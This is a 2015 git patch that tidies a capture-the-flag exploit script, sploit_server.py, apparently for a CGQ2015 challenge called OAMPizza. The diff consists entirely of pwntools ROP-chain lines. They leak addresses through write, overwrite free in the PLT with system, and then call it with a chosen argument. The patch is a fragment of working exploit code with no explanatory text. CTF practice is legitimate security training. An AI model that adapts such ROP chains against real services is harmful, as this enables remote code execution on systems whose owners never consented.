From bf719571b222a2d4364c620b5d3a3f7039c8fe6a Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Sergiusz=20=27q3k=27=20Baza=C5=84ski?= <q3k@q3k.org>
Date: Sun, 15 Mar 2015 21:23:43 +0100
Subject: [PATCH] Clean up CGQ2015 OAMPizza exploit

---
 CGQ2015/sploit_server.py | 6 +++---
 1 file changed, 3 insertions(+), 3 deletions(-)

diff --git a/CGQ2015/sploit_server.py b/CGQ2015/sploit_server.py
index 6558d6b..3d2dcff 100644
--- a/CGQ2015/sploit_server.py
+++ b/CGQ2015/sploit_server.py
@@ -86,10 +86,10 @@ sent_buffer += pwn.p64(POP_RDI) + pwn.p64(0) + pwn.p64(POP_RSI_R15) + pwn.p64(SY
 sent_buffer += pwn.p64(READ)
 
 ## RESEND TO CLIENT FOR DEBUG
-sent_buffer += pwn.p64(POP_MANY) + pwn.p64(0xFFFFFFFFFFFFFFFF) + pwn.p64(0) + pwn.p64(0x60d088) + pwn.p64(8) + pwn.p64(0) + pwn.p64(0)
+sent_buffer += pwn.p64(POP_MANY) + pwn.p64(0xFFFFFFFFFFFFFFFF) + pwn.p64(0) + pwn.p64(0x60d088) + pwn.p64(SYSTEM_ARG_LENGTH) + pwn.p64(0) + pwn.p64(0)
 sent_buffer += pwn.p64(RDX_SHIT)
 sent_buffer += pwn.p64(8) * 7
-sent_buffer += pwn.p64(POP_RDI) + pwn.p64(1) + pwn.p64(POP_RSI_R15) + pwn.p64(LEAK_ADDRESS+8) + pwn.p64(0)
+sent_buffer += pwn.p64(POP_RDI) + pwn.p64(1) + pwn.p64(POP_RSI_R15) + pwn.p64(SYSTEM_ARG_ADDRESS) + pwn.p64(0)
 sent_buffer += pwn.p64(WRITE)
 
 ## OVERRIDE FREE IN PLT WITH SYSTEM CALCULATED BY CLIENT
@@ -100,7 +100,7 @@ sent_buffer += pwn.p64(POP_RDI) + pwn.p64(0) + pwn.p64(POP_RSI_R15) + pwn.p64(LE
 sent_buffer += pwn.p64(READ)
 
 ## CALL OVERRIDDEN FREE/SYSTEM
-sent_buffer += pwn.p64(POP_RDI) + pwn.p64(LEAK_ADDRESS+8)
+sent_buffer += pwn.p64(POP_RDI) + pwn.p64(SYSTEM_ARG_ADDRESS)
 sent_buffer += pwn.p64(POP_RBP) + pwn.p64(LEAK_ADDRESS-0x48)
 sent_buffer += pwn.p64(CALL_RBP)